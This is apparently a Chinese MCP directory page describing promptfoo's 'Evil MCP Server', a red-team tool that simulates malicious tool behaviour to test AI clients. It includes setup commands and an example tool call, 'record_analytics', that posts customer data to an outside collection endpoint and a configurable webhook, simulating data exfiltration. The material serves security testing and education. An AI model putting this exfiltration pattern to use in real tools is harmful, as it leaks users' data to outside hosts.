Token导航 LogoToken导航TokenDH.com
Evil MCP Server logo
安全风控未说明官方级别未说明来源级核验

Evil MCP Server

MCP Server

一个模拟恶意行为的MCP服务器,用于安全测试、漏洞评估和教育演示。

工具数

0

提示词数

0

GitHub Stars

30

资源数

0
安全TypeScriptClaudeClaude DesktopClaude

安装说明

本站只整理中文说明和来源信息,不托管安装包,也不代用户安装。

作者 / 组织

promptfoo

提供方

promptfoo

最后核验

2026/5/17 20:22

快速接入

先看主来源和安装命令,再打开仓库或文档;下面只保留这个条目的关键接入事实。

详细介绍

恶意MCP服务器

⚠️ 警告:此MCP服务器仅出于安全测试目的模拟恶意行为。请勿在生产环境中使用。

概述

一种模型上下文协议(MCP)服务器,提供模拟各种攻击向量的工具,用于安全测试和演示。

快速开始

# Run as MCP server (stdio mode)
npm run run:stdio

# Run as HTTP server on default port (3666)
npm run run:http

# Run as HTTP server on custom port
npm run run:http -- --port 8080

环境变量

  • EVIL_WEBHOOK_URL -(可选)用于向其发送分析数据的Webhook URL。如果未设置,则禁用Webhook功能。

安装

npm install
npm run build

用法

作为MCP服务器(stdio模式-默认)

添加到您的Claude Desktop配置(~/Library/Application Support/Claude/claude_desktop_config.json):

{
  "mcpServers": {
    "evil-mcp-server": {
      "command": "node",
      "args": ["/path/to/evil-mcp-server/dist/index.js"]
    }
  }
}

作为HTTP服务器

在默认端口(3666)上以HTTP模式运行服务器:

node dist/index.js --http

或者指定自定义端口:

node dist/index.js --http --port 8080

HTTP API终结点

  • GET /health -健康检查端点
  • GET /tools -列出所有可用工具
  • POST /tools/call -执行工具

示例工具调用:

curl -X POST http://localhost:3666/tools/call \
  -H "Content-Type: application/json" \
  -d '{
    "name": "record_analytics",
    "arguments": {
      "customerData": {"id": "12345", "name": "Test User"},
      "endpoint": "https://example.com/collect"
    }
  }'

可用工具

  • 记录分析:模拟客户数据的泄露

发展

npm run dev    # Run in development mode with auto-reload
npm run build  # Build for production
npm start      # Run production build

安全通知

此服务器设计用于:

  • 安全测试和漏洞评估
  • 教育示范
  • 红队演习
  • 安全意识培训

不要 将此服务器用于真实的客户数据或生产环境。

目录标签

目录标签

安全TypeScriptClaude安全测试本地部署漏洞评估教育演示红队演练

支持客户端

Claude DesktopClaude

接入字段

传输方式(transport,传输协议)

未说明

鉴权方式(authType,认证方式)

none

工具数量(toolCount,工具数)

0

资源数量(resourceCount,资源数)

0

提示词数量(promptCount,提示词数)

0

权限和风险

未说明none部署方式未说明

接入前请确认传输方式、认证方式和部署位置,并根据实际工具能力限制访问范围。

安装前确认

不要直接授予不必要的文件、网络或账号权限;先核对安装命令和配置内容。

仍需确认:installCommand

来源信息

继续浏览同类 MCP